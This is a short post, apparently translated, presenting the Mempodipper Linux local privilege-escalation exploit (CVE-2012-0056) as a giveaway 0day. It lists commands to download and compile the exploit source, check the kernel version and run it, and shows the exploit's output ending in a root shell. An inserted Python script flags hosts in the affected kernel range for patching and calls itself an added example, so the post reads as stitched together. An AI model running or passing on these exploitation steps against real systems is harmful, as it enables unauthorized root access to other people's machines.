Mempodipper - Linux Local Root for >=2.6.39, 32-bit and 64-bit

First day back at work, so here is a Linux 0day for everyone. Happy New Year: may your work go smoothly and your life be full.

1. Download the exploit source

wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c

2. Compile

gcc mempodipper.c -o mempodipper
3. Check the environment before running

netcat@netcat:~$ uname -r
3.0.0-12-generic
netcat@netcat:~$ cat /etc/issue
Ubuntu 11.10 \n \l
netcat@netcat:~$ uname -a
Linux netcat 3.0.0-12-generic #20-Ubuntu SMP Fri Oct 7 14:50:42 UTC 2011 i686 i686 i386 GNU/Linux
netcat@netcat:~$ id
uid=1000(netcat) gid=1000(netcat) 组=1000(netcat),4(adm),20(dialout),24(cdrom),46(plugdev),116(lpadmin),118(admin),124(sambashare)
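The pre-run check above boils down to reading `uname -r` and comparing it with the affected range in the title (kernels from 2.6.39 on). The script below is an added example, not part of the original post and not from mempodipper.c or its author: it parses `uname -r` strings from a host inventory and lists the hosts whose kernel version falls in the vulnerable range so they can be queued for patching. The affected floor (2.6.39) comes from the title; the fixed versions per stable branch (3.0.18, 3.1.10, 3.2.2) are assumptions made here, and the sample inventory is constructed. Distribution kernels frequently backport fixes without changing the version string (the Ubuntu kernel shown above carries a package revision, `-12`, not a mainline point release), so a version-only check identifies hosts to review, not hosts that are certainly exploitable.

```python
"""Kernel-version triage for CVE-2012-0056 (Mempodipper).

Added example, not part of the original post or of mempodipper.c.
AFFECTED_FLOOR comes from the post title (">=2.6.39"); the STABLE_FIXES
table is an assumption made in this example.  Distribution kernels often
backport fixes without bumping the version string, so a match here means
"review the installed package", not "confirmed vulnerable".
"""
import re

AFFECTED_FLOOR = (2, 6, 39)

# Assumption: first release on each stable branch that carries the fix.
# Branches newer than any listed here are treated as fixed; 2.6.39.x never
# received the fix (the branch was already end-of-life).
STABLE_FIXES = {
    (3, 0): 18,
    (3, 1): 10,
    (3, 2): 2,
}
NEWEST_FIXED_BRANCH = max(STABLE_FIXES)


def parse_kernel_release(release: str) -> tuple:
    """Turn a `uname -r` string such as '3.0.0-12-generic' into (3, 0, 0).

    Only the leading numeric major.minor[.patch] is used; the distribution
    suffix (e.g. '-12-generic') is ignored because it says nothing about
    which upstream fixes were backported.
    """
    m = re.match(r"\s*(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not m:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    major, minor, patch = m.groups()
    return (int(major), int(minor), int(patch or 0))


def is_in_affected_range(release: str) -> bool:
    """True when the upstream version falls in the range the post describes."""
    version = parse_kernel_release(release)
    if version < AFFECTED_FLOOR:
        return False
    branch = version[:2]
    if branch in STABLE_FIXES:
        # Affected until the stable release that carries the fix.
        return version[2] < STABLE_FIXES[branch]
    # Branches newer than the newest fixed branch shipped with the fix;
    # anything between the floor and that branch (i.e. 2.6.39.x) did not.
    return branch < NEWEST_FIXED_BRANCH


def triage(inventory) -> list:
    """Return hostnames whose `uname -r` output is in the affected range.

    inventory: iterable of (hostname, uname_r) pairs.
    """
    return [host for host, release in inventory if is_in_affected_range(release)]


# Constructed sample inventory: the host from the post plus a few others.
SAMPLE_INVENTORY = [
    ("netcat", "3.0.0-12-generic"),   # the machine shown in the post
    ("db01", "2.6.32-5-amd64"),       # below the affected floor
    ("web01", "3.0.18"),              # assumed fixed stable release
    ("build01", "3.2.1"),             # 3.2 branch before the assumed fix
    ("lab01", "3.3.0"),               # newer branch, shipped with the fix
]

if __name__ == "__main__":
    for host in triage(SAMPLE_INVENTORY):
        print(f"{host}: kernel version in CVE-2012-0056 range, review installed package")
```

Feed it real `uname -r` output collected per host and then confirm each flagged host against the distribution's security advisory for its kernel package, since the version string alone cannot tell a backported fix from an unpatched kernel.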

4. Run

netcat@netcat:~$ ./mempodipper
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Ptracing su to find next instruction without reading binary.
[+] Creating ptrace pipe.
[+] Forking ptrace child.
[+] Waiting for ptraced child to give output on syscalls.
[+] Ptrace_traceme'ing process.
[+] Error message written. Single stepping to find address.
[+] Resolved call address to 0x8049570.
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/3012/mem in child.
[+] Sending fd 6 to parent.
[+] Received fd at 6.
[+] Assigning fd 6 to stderr.
[+] Calculating su padding.
[+] Seeking to offset 0x8049564.
[+] Executing su with shellcode.
sh-4.2#
Attached screenshot: